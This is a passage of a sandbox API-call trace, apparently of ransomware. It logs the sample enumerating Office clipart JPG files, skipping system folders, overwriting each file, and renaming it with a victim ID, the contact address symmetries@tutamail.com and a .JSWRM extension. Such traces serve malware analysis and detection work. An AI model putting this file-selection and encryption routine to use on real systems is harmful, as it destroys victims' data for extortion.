lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0090.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0090.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0090.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0090.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0090.194] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382960.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382960.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382960.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382960.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0090.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0090.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0090.195] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18ac4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382961.JPG", cAlternateFileName="")) returned 1 [0090.195] lstrcmpiW (lpString1="J0382961.JPG", lpString2=".") returned 1 [0090.195] lstrcmpiW (lpString1="J0382961.JPG", lpString2="..") returned 1 [0090.195] lstrcmpiW (lpString1="J0382961.JPG", lpString2="...") returned 1 [0090.195] lstrcmpiW (lpString1="J0382961.JPG", lpString2="windows") returned -1 [0090.195] lstrcmpiW (lpString1="J0382961.JPG", lpString2="recovery") returned -1 [0090.195] lstrcmpiW (lpString1="J0382961.JPG", lpString2="perflogs") returned -1 [0090.195] lstrcmpiW (lpString1="J0382961.JPG", lpString2="documents and settings") returned 1 [0090.195] lstrcmpiW (lpString1="J0382961.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.195] lstrcmpiW (lpString1="J0382961.JPG", lpString2="system volume information") returned -1 [0090.196] lstrcmpiW (lpString1="J0382961.JPG", lpString2="msocache") returned -1 [0090.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0090.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382961.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382961.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382961.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0090.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0090.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382961.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382961.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382961.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0090.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0090.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0090.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0090.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382961.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382961.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.196] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=101060) returned 1 [0090.196] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18ac0) returned 0x24d210 [0090.197] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x18ac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x18ac0, lpOverlapped=0x0) returned 1 [0090.218] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.218] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x18ac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x18ac0, lpOverlapped=0x0) returned 1 [0090.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.244] CloseHandle (hObject=0x314) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0090.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0090.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0090.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0090.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0090.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.246] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382961.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382961.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382961.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382961.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0090.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0090.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0090.247] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bef7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382962.JPG", cAlternateFileName="")) returned 1 [0090.247] lstrcmpiW (lpString1="J0382962.JPG", lpString2=".") returned 1 [0090.248] lstrcmpiW (lpString1="J0382962.JPG", lpString2="..") returned 1 [0090.248] lstrcmpiW (lpString1="J0382962.JPG", lpString2="...") returned 1 [0090.248] lstrcmpiW (lpString1="J0382962.JPG", lpString2="windows") returned -1 [0090.248] lstrcmpiW (lpString1="J0382962.JPG", lpString2="recovery") returned -1 [0090.248] lstrcmpiW (lpString1="J0382962.JPG", lpString2="perflogs") returned -1 [0090.248] lstrcmpiW (lpString1="J0382962.JPG", lpString2="documents and settings") returned 1 [0090.248] lstrcmpiW (lpString1="J0382962.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.248] lstrcmpiW (lpString1="J0382962.JPG", lpString2="system volume information") returned -1 [0090.248] lstrcmpiW (lpString1="J0382962.JPG", lpString2="msocache") returned -1 [0090.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0090.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382962.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382962.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382962.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0090.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0090.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382962.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382962.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382962.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0090.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0090.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0090.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0090.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382962.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382962.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.249] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114423) returned 1 [0090.249] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1bef0) returned 0x24d210 [0090.250] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1bef0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1bef0, lpOverlapped=0x0) returned 1 [0090.259] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.259] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1bef0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1bef0, lpOverlapped=0x0) returned 1 [0090.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.260] CloseHandle (hObject=0x314) returned 1 [0090.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0090.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0090.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0090.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0090.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0090.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0090.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0090.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0090.261] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382962.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382962.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382962.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382962.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0090.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0090.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0090.262] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17dee, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382963.JPG", cAlternateFileName="")) returned 1 [0090.262] lstrcmpiW (lpString1="J0382963.JPG", lpString2=".") returned 1 [0090.262] lstrcmpiW (lpString1="J0382963.JPG", lpString2="..") returned 1 [0090.262] lstrcmpiW (lpString1="J0382963.JPG", lpString2="...") returned 1 [0090.262] lstrcmpiW (lpString1="J0382963.JPG", lpString2="windows") returned -1 [0090.262] lstrcmpiW (lpString1="J0382963.JPG", lpString2="recovery") returned -1 [0090.262] lstrcmpiW (lpString1="J0382963.JPG", lpString2="perflogs") returned -1 [0090.262] lstrcmpiW (lpString1="J0382963.JPG", lpString2="documents and settings") returned 1 [0090.262] lstrcmpiW (lpString1="J0382963.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.262] lstrcmpiW (lpString1="J0382963.JPG", lpString2="system volume information") returned -1 [0090.262] lstrcmpiW (lpString1="J0382963.JPG", lpString2="msocache") returned -1 [0090.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0090.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382963.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382963.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382963.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0090.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0090.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382963.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382963.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382963.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0090.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0090.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0090.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0090.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382963.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382963.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.263] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=97774) returned 1 [0090.263] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17de0) returned 0x24d210 [0090.264] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x17de0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x17de0, lpOverlapped=0x0) returned 1 [0090.273] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.273] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x17de0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x17de0, lpOverlapped=0x0) returned 1 [0090.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.274] CloseHandle (hObject=0x314) returned 1 [0090.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0090.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0090.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0090.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0090.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0090.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0090.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0090.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0090.274] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382963.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382963.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382963.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382963.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0090.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0090.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0090.275] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bb02, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382965.JPG", cAlternateFileName="")) returned 1 [0090.275] lstrcmpiW (lpString1="J0382965.JPG", lpString2=".") returned 1 [0090.275] lstrcmpiW (lpString1="J0382965.JPG", lpString2="..") returned 1 [0090.275] lstrcmpiW (lpString1="J0382965.JPG", lpString2="...") returned 1 [0090.275] lstrcmpiW 